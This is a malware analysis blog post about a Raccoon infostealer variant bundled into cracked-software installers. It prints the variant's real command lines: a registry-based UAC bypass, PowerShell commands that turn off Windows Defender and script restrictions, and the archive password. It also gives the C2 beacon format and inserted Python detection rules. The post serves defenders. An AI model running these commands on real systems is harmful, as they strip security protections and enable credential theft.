Conhost.exe Forcev1: New Raccoon Malware You Should Know

conhost.exe 0xffffffff -ForceV1: The one that got away

Amidst an expanding background of emerging COVID-19 cyber threats, the ReasonLabs research team discovered and reported on a new variant of the Raccoon malware family. Raccoon was first discovered back in 2019; the variant dubbed conhost.exe 0xffffffff -ForceV1 is a new member of that family, designed to steal user data from browsers. In this article, we analyze this new variant, its attack methods, and its disguise techniques.

conhost.exe 0xffffffff -ForceV1: What do we know?

Here’s what we know so far:

  • The new variant masquerades as the installer of a legitimate, well-known program.
  • The new sample flew under the AV radar: it was uploaded to VirusTotal more than two weeks ago and had only three minimal detections.
  • This Trojan horse belongs to the Raccoon malware family.
  • The Trojan is designed to steal user data from about 60 browsers. It is also capable of taking screenshots of the victim's machine and capturing input.

The first versions seen in the wild were written in C++, but a year has gone by and the malware authors have since developed new versions written in Borland Delphi, apparently to make it harder to detect and analyze. The malware comes inside an Inno Setup installer that is responsible for installing both the original program and the malware.

Execution flow of the Trojan installation

The Inno Setup script file runs the regular installation and extracts the malware.

The samples we obtained imitate benign program installers (e.g. Bandicam, Revo Uninstaller) but hide a Trojan inside them. The installation of the original program proceeds as usual, so the user has no reason to suspect that anything malicious happened (the bundled programs are usually cracked versions of paid software, so the user already knows the installer did not come from the vendor's site). The execution flow of the Trojan installation is very apparent, with alarming command lines and the execution of PowerShell and VBScript, which should have raised alarm bells in every security product. However, for some reason, the samples we caught had only three minimal detections on VirusTotal (and as of May 6th, 2020, even 0 detections!), although they were uploaded to VirusTotal more than two weeks ago.

The malware disables Windows Defender using PowerShell, uses VBScript to unpack executables from a password-protected zip file contained in the installer, and changes the registry to disable the admin approval prompt.

The sophisticated network communication remains the same as in the first versions: web requests to Google Docs (or GitHub) in order to acquire the malware's CNC IP address, so that the address is not hardcoded in the sample. The first stage filters the CNC address out of the response and then sends base64-encoded parameters (decoding to bot_id=59407D34-C8C5-44DF-A766-BA8A11CB1CB0_Shayne&config_id=654d0d2e43e786a31eb3ea9dc114b4d91d2014d0&data=null) to "gate/log.php".
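As an added example (not part of the ReasonLabs report), a small Python parser that recognises the first-stage check-in described above by its URL path and by the shape of the decoded parameters; the sample body is the decoded string quoted above, re-encoded, and the bot_id/config_id patterns are assumptions generalised from that single sample.

```python
import base64
import re
from urllib.parse import parse_qs

# Added example: shape of the first-stage check-in described above, i.e. base64 of
# "bot_id=<GUID>_<user>&config_id=<40 hex chars>&data=...", sent to gate/log.php.
# Both patterns are assumptions generalised from the single decoded sample in the report.
BOT_ID_RE = re.compile(r"^[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}_[^&=]+$")
CONFIG_ID_RE = re.compile(r"^[0-9a-f]{40}$")

def decode_beacon(body: str) -> dict:
    """Base64-decode a request body and split it into its key=value fields.
    Raises ValueError when the body is not valid base64."""
    raw = base64.b64decode(body, validate=True).decode("ascii")
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}

def looks_like_raccoon_checkin(path: str, body: str) -> bool:
    """True when the URL path and the decoded body match the first-stage beacon."""
    if not path.endswith("/gate/log.php"):
        return False
    try:
        fields = decode_beacon(body)
    except ValueError:  # bad base64 or non-ASCII payload
        return False
    return (BOT_ID_RE.match(fields.get("bot_id", "")) is not None
            and CONFIG_ID_RE.match(fields.get("config_id", "")) is not None
            and "data" in fields)

# Constructed sample: the decoded string quoted in the report, re-encoded.
SAMPLE_PLAINTEXT = ("bot_id=59407D34-C8C5-44DF-A766-BA8A11CB1CB0_Shayne"
                    "&config_id=654d0d2e43e786a31eb3ea9dc114b4d91d2014d0&data=null")
SAMPLE_BODY = base64.b64encode(SAMPLE_PLAINTEXT.encode()).decode()

if __name__ == "__main__":
    print(decode_beacon(SAMPLE_BODY))
    print("raccoon check-in:", looks_like_raccoon_checkin("/gate/log.php", SAMPLE_BODY))
```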

Connections

| PID  | Process | IP                 | ASN         | CN | Reputation  |
|------|---------|--------------------|-------------|----|-------------|
| 1440 | sn.exe  | 172.217.16.174:443 | Google Inc. | US | whitelisted |
| 1440 | sn.exe  | 216.58.208.33:443  | Google Inc. | US | whitelisted |
| 1440 | sn.exe  | 34.65.6.73:80      |             | US | malicious   |

DNS requests

| Domain                               | IP             | Reputation  |
|--------------------------------------|----------------|-------------|
| drive.google.com                     | 172.217.16.174 | shared      |
| doc-08-6g-docs.googleusercontent.com | 216.58.208.33  | whitelisted |

Process tree (the malicious part):

  • cmd.exe (PID: 4204 cmdline: C:\Windows\system32\cmd.exe /c "C:\ProgramData\uacb.cmd")
    • conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
    • reg.exe (PID: 1364 cmdline: REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f)
    • reg.exe (PID: 5468 cmdline: REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f)
  • cmd.exe (PID: 3968 cmdline: C:\Windows\system32\cmd.exe /c "C:\ProgramData\cloudb.cmd")
    • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
    • powershell.exe (PID: 3132 cmdline: PowerShell Set-ExecutionPolicy -ExecutionPolicy Bypass -Force)
    • powershell.exe (PID: 5480 cmdline: PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend)
  • wscript.exe (PID: 5264 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\runner.vbs")
    • cmd.exe (PID: 5336 cmdline: C:\Windows\system32\cmd.exe /c "C:\ProgramData\7z.cmd")
      • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1)
      • 7za.exe (PID: 5432 cmdline: "7za.exe" x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData)
      • sn.exe (PID: 5560 cmdline: sn.exe)
        • sn.exe (PID: 5840 cmdline: {path})

The installer

[Figure: sn.exe file inside data.zip in the installer.]

[Figure: The files contained in the installer.]

[Figure: Extraction of sn.exe from a password-protected zip file.]

[Figure: Whole installation script.]

IOCs:

*docs.googleusercontent.com

ip.of.cn.c/gate/log.php

Execution flow of:

cmd.exe /c "C:\ProgramData\uacb.cmd"

    • REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
    • REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
    • cmd.exe /c "C:\ProgramData\cloudb.cmd"
    • PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    • WScript.exe "C:\ProgramData\runner.vbs"
    • cmd.exe /c "C:\ProgramData\7z.cmd"
    • "7za.exe" x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData
    • sn.exe
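As an added example (not the report's own detection logic), a Python detection pass over constructed process-creation records modelled on the process tree and execution flow above: each rule matches one stage of the installation chain (the ms-settings handler hijack, the ConsentPromptBehaviorAdmin change, the Set-MpPreference and Set-ExecutionPolicy calls, the VBScript launched from ProgramData and the password-protected 7za extraction), and a host is flagged when several distinct stages appear. The regexes, the sample records and the three-stage threshold are assumptions.

```python
import re

# Added example, not the report's own logic: each rule pairs a label with a case-insensitive
# regex over the process command line, derived from the command lines in the process tree above.
RULES = [
    ("ms-settings handler hijack", re.compile(
        r"reg\s+add\s+\W?hkcu\\software\\classes\\ms-settings\\shell\\open\\command", re.I)),
    ("ConsentPromptBehaviorAdmin set to 0", re.compile(
        r"policies\\system\s+/v\s+ConsentPromptBehaviorAdmin\s+/t\s+REG_DWORD\s+/d\s+0", re.I)),
    ("Defender real-time monitoring disabled", re.compile(
        r"Set-MpPreference\s.*-DisableRealtimeMonitoring\s+(1|\$true)", re.I)),
    ("execution policy bypass", re.compile(r"Set-ExecutionPolicy\s.*Bypass", re.I)),
    ("wscript launched from ProgramData", re.compile(
        r"wscript\.exe.*\\ProgramData\\.*\.vbs", re.I)),
    ("password-protected archive unpacked to ProgramData", re.compile(
        r"7za?\.exe\W*\s+x\s.*-p\S+.*-o\S*\\ProgramData", re.I)),
]

def match_rules(cmdline):
    """Return the labels of every rule whose pattern occurs in cmdline."""
    return [label for label, rx in RULES if rx.search(cmdline)]

def scan_events(events):
    """events: iterable of (pid, cmdline) records; returns {label: [pids]} for rules that fired."""
    hits = {}
    for pid, cmdline in events:
        for label in match_rules(cmdline):
            hits.setdefault(label, []).append(pid)
    return hits

def is_raccoon_install_chain(events, min_rules=3):
    """Flag a host once at least min_rules distinct stages of the chain appear (threshold assumed)."""
    return len(scan_events(events)) >= min_rules

# Constructed sample records modelled on the process tree in the report (plus one benign control).
SAMPLE_EVENTS = [
    (1364, r'REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d '
           r'"C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion'
           r'\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f'),
    (5468, r'REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f'),
    (3132, r'PowerShell Set-ExecutionPolicy -ExecutionPolicy Bypass -Force'),
    (5480, r'PowerShell Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 '
           r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend'),
    (5264, r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\runner.vbs"'),
    (5432, r'"7za.exe" x data.zip -pwvYhE9sFeUuqndPK -oC:\ProgramData'),
    (4321, r'"C:\Program Files\Editor\editor.exe" /open notes.txt'),  # benign control record
]

if __name__ == "__main__":
    for label, pids in scan_events(SAMPLE_EVENTS).items():
        print(f"{label}: pids {pids}")
    print("chain detected:", is_raccoon_install_chain(SAMPLE_EVENTS))
```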

SHA256 of whole samples (not the dropped samples):


About ReasonLabs

ReasonLabs plays a leading role in advancing the state of cybersecurity intelligence. We collect raw data about existing and emerging threats from always-on active sensors and then continuously analyze, organize, and add context to evolving cyber activities and attacks in order to deliver actionable insights in real time. This powerful intelligence network leaves Reason prepared to meet threats head-on.

For more information, visit www.reasonlabs.com